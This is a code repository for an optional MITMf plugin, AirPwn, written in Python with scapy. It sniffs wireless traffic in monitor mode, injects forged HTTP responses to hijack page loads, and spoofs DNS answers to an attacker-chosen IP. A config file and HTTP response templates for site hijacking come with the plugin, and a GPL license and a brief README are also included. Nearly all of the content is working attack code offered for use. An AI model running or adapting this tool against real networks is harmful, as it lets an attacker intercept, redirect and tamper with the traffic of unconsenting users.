├── AirPwn.py ├── LICENSE ├── README.md └── config ├── airpwn.cfg └── airpwn_templates ├── airpwn_cssbg ├── airpwned_png ├── ftp_resp ├── greet_html ├── js_html ├── puppy_jpg └── site_hijack /AirPwn.py: -------------------------------------------------------------------------------- 1 | # Some of this code was stolen from https://jordan-wright.github.io/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/ 2 | 3 | from plugins.plugin import Plugin 4 | import threading 5 | import logging 6 | import sys 7 | import re 8 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy 9 | from scapy.all import * 10 | 11 | try: 12 | from configobj import ConfigObj 13 | except: 14 | sys.exit('[-] configobj library not installed!') 15 | 16 | class AirPwn(Plugin): 17 | name = 'Airpwn' 18 | optname = 'airpwn' 19 | desc = 'Monitor traffic on an 802.11 network and respond with arbitrary content as configured' 20 | has_opts = True 21 | 22 | def initialize(self, options): 23 | self.options = options 24 | self.mon_interface = options.interface 25 | self.aircfg = options.aircfg 26 | self.dnspwn = options.dnspwn 27 | 28 | if os.geteuid() != 0: 29 | sys.exit("[-] AirPwn plugin requires root privileges") 30 | 31 | if not self.mon_interface: 32 | sys.exit("[-] AirPwn plugin requires --miface argument") 33 | 34 | try: 35 | self.aircfg = ConfigObj("./config/airpwn.cfg") 36 | #Here we compile the regexes for faster performance when injecting packets 37 | for rule in self.aircfg.items(): 38 | rule[1]['match'] = re.compile(r'%s' % rule[1]['match']) 39 | if 'ignore' in rule[1].keys(): 40 | rule[1]['ignore'] = re.compile(r'%s' % rule[1]['ignore']) 41 | 42 | except Exception, e: 43 | sys.exit("[-] Error parsing airpwn config file: %s" % e) 44 | 45 | print "[*] AirPwn plugin online" 46 | t = threading.Thread(name='sniff_http_thread', target=self.sniff_http, args=(self.mon_interface,)) 47 | t.setDaemon(True) 48 | t.start() 49 | 50 | if self.dnspwn: 51 | print "[*] DNSpwn attack enabled" 52 | t2 = threading.Thread(name='sniff_dns_thread', target=self.sniff_dns, args=(self.mon_interface,)) 53 | t2.setDaemon(True) 54 | t2.start() 55 | 56 | def sniff_http(self, iface): 57 | sniff(filter="tcp and port 80", prn=self.http_callback, iface=iface) 58 | 59 | def sniff_dns(self, iface): 60 | sniff(filter="udp and port 53", prn=self.dns_callback, iface=iface) 61 | 62 | def http_callback(self, packet): 63 | if packet.haslayer(TCP) and packet.haslayer(Raw): 64 | for rule in self.aircfg.items(): 65 | if 'ignore' in rule[1].keys(): 66 | if (re.search(rule[1]['match'], packet[Raw].load)) and not (re.search(rule[1]['ignore'], packet[Raw].load)): 67 | # First we copy the original packet 68 | response = packet.copy() 69 | # We need to start by changing our response to be "from-ds", or from the access point. 70 | response.FCfield = 2L 71 | # Switch the MAC addresses 72 | response.addr1, response.addr2 = packet.addr2, packet.addr1 73 | # Switch the IP addresses 74 | response.src, response.dst = packet.dst, packet.src 75 | # Switch the ports 76 | response.sport, response.dport = packet.dport, packet.sport 77 | # Switch sequence and ack 78 | response[TCP].seq = packet[TCP].ack 79 | # Inject our data 80 | response[Raw].load = open(rule[1]['response'], 'rb').read() 81 | # Calculate new ack 82 | response[TCP].ack = packet[TCP].seq + len(response[Raw].load) 83 | # Delete packet checksums 84 | del response[IP].chksum 85 | del response[TCP].chksum 86 | # Some scapy-fu to re-calculate all checksums 87 | response = response.__class__(str(response)) 88 | # Send the packet 89 | sendp(response, iface=self.mon_interface, verbose=False) 90 | logging.info("%s >> Replaced content" % response.src) 91 | 92 | elif 'ignore' not in rule[1].keys(): 93 | if (re.search(rule[1]['match'], packet[Raw].load)): 94 | response = packet.copy() 95 | response.FCfield = 2L 96 | response.addr1, response.addr2 = packet.addr2, packet.addr1 97 | response.src, response.dst = packet.dst, packet.src 98 | response.sport, response.dport = packet.dport, packet.sport 99 | response[TCP].seq = packet[TCP].ack 100 | response[Raw].load = open(rule[1]['response'], 'rb').read() 101 | response[TCP].ack = packet[TCP].seq + len(response[Raw].load) 102 | del response[IP].chksum 103 | del response[TCP].chksum 104 | response = response.__class__(str(response)) 105 | sendp(response, iface=self.mon_interface, verbose=False) 106 | logging.info("%s >> Replaced content" % response.src) 107 | 108 | def dns_callback(self, packet): 109 | if packet.haslayer(UDP) and packet.haslayer(DNS): 110 | req_domain = packet[DNS].qd.qname 111 | response = packet.copy() 112 | response.FCfield = 2L 113 | response.addr1, response.addr2 = packet.addr2, packet.addr1 114 | response.src, response.dst = packet.dst, packet.src 115 | response.sport, response.dport = packet.dport, packet.sport 116 | # Set the DNS flags 117 | response[DNS].qr = 1L 118 | response[DNS].ra = 1L 119 | response[DNS].ancount = 1 120 | response[DNS].an = DNSRR( 121 | rrname = req_domain, 122 | type = 'A', 123 | rclass = 'IN', 124 | ttl = 900, 125 | rdata = self.dnspwn 126 | ) 127 | 128 | del response[IP].chksum 129 | del response[UDP].chksum 130 | del response[UDP].len 131 | response = response.__class__(str(response)) 132 | 133 | sendp(response, iface=self.mon_interface, verbose=False) 134 | logging.info("%s >> Spoofed DNS for %s" % (response.src, req_domain)) 135 | 136 | def add_options(self, options): 137 | options.add_argument('--dnspwn', type=str, dest='dnspwn', help='Enables the DNSpwn attack and specifies ip') 138 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. 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If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 340 | 341 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | MITMf-opt-plugins 2 | ================= 3 | 4 | This repo contains optional plugins for MITMf. 5 | 6 | These are not included in the main repo because they are not fully tested/functional or do not fit a particular category/standard 7 | -------------------------------------------------------------------------------- /config/airpwn.cfg: -------------------------------------------------------------------------------- 1 | #Example config for the AirPwn plugin 2 | 3 | [site_hijack] 4 | match = ^(GET|POST).* 5 | ignore = (^GET [^ ?]+\.(?:jpg|jpeg|gif|png|ico|css)|(?:host: .*google.com)) 6 | response = ./config_files/airpwn_templates/site_hijack -------------------------------------------------------------------------------- /config/airpwn_templates/airpwn_cssbg: -------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Content-type: text/css 3 | Content-length: 103 4 | 5 | body { 6 | background-color: red; 7 | background-image: url(/airpwnbg.jpg); 8 | background-repeat: repeat; 9 | } 10 | -------------------------------------------------------------------------------- /config/airpwn_templates/airpwned_png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/byt3bl33d3r/MITMf-opt-plugins/4642b6aa9477732b5e236998f161b2eae8892643/config/airpwn_templates/airpwned_png -------------------------------------------------------------------------------- /config/airpwn_templates/ftp_resp: -------------------------------------------------------------------------------- 1 | 331 FTP IS FUN!!!! ENJOY YOUR DATA!!! 2 | 3 | -------------------------------------------------------------------------------- /config/airpwn_templates/greet_html: -------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Connection: close 3 | Content-Type: text/html 4 | 5 | HELLO DEFCON! 6 | 7 | 8 | Hello Defcon! Your wireless network is delicious! 9 | 10 | 11 |

12 | -------------------------------------------------------------------------------- /config/airpwn_templates/js_html: -------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Connection: close 3 | Content-Type: text/html 4 | 5 | pwned 6 | 13 | 14 | -------------------------------------------------------------------------------- /config/airpwn_templates/puppy_jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/byt3bl33d3r/MITMf-opt-plugins/4642b6aa9477732b5e236998f161b2eae8892643/config/airpwn_templates/puppy_jpg -------------------------------------------------------------------------------- /config/airpwn_templates/site_hijack: -------------------------------------------------------------------------------- 1 | HTTP/1.1 200 OK 2 | Connection: close 3 | Content-Type: text/html 4 | Content-Length: 250 5 | 6 | 7 | hugs 8 | 9 | 11 |

12 | BYE BYE! 13 | 14 | 15 |